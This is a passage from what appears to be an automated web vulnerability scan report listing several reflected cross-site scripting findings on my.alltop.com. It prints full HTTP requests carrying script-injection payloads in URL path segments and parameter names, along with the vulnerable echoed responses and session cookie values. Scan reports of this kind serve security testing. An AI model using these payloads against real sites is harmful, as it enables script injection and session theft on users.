Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E9)%3C/script%3E33c92"><script>alert(1)</script>c39e161a26a" method="post" accept-charset="utf-8">
...[SNIP]...

1.46. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de3e"><script>alert(1)</script>6fda5037cda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C5de3e"><script>alert(1)</script>6fda5037cda/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C5de3e"><script>alert(1)</script>6fda5037cda/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.47. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd035"><script>alert(1)</script>c63524382bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3Cfd035"><script>alert(1)</script>c63524382bb/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:03 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:03 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3Cfd035"><script>alert(1)</script>c63524382bb/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.48. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5062"><script>alert(1)</script>2da5f045f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3Cd5062"><script>alert(1)</script>2da5f045f4/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3Cd5062"><script>alert(1)</script>2da5f045f4/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.49. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532db"><script>alert(1)</script>53992fc5b37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E532db"><script>alert(1)</script>53992fc5b37 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E532db"><script>alert(1)</script>53992fc5b37" method="post" accept-charset="utf-8">
...[SNIP]...

1.50. http://my.alltop.com/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60135"><script>alert(1)</script>2cb98114909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E?60135"><script>alert(1)</script>2cb98114909=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E?60135"><script>alert(1)</script>2cb98114909=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.51. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c4c"><script>alert(1)</script>35bcdd6c458 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b75c4c"><script>alert(1)</script>35bcdd6c458/%22ns=%22netsparker(0x000167) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:02 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b75c4c"><script>alert(1)</script>35bcdd6c458/%22ns=%22netsparker(0x000167)" method="post" accept-charset="utf-8">
...[SNIP]...

1.52. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593e6"><script>alert(1)</script>4a1d1b6d74f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%22ns593e6"><script>alert(1)</script>4a1d1b6d74f=%22netsparker(0x000167) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%22ns593e6"><script>alert(1)</script>4a1d1b6d74f=%22netsparker(0x000167)" method="post" accept-charset="utf-8">
...[SNIP]...

1.53. http://my.alltop.com/alpha/b/%22ns=%22netsparker(0x000167) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%22ns=%22netsparker(0x000167)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1219d"><script>alert(1)</script>2819410e845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%22ns=%22netsparker(0x000167)?1219d"><script>alert(1)</script>2819410e845=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
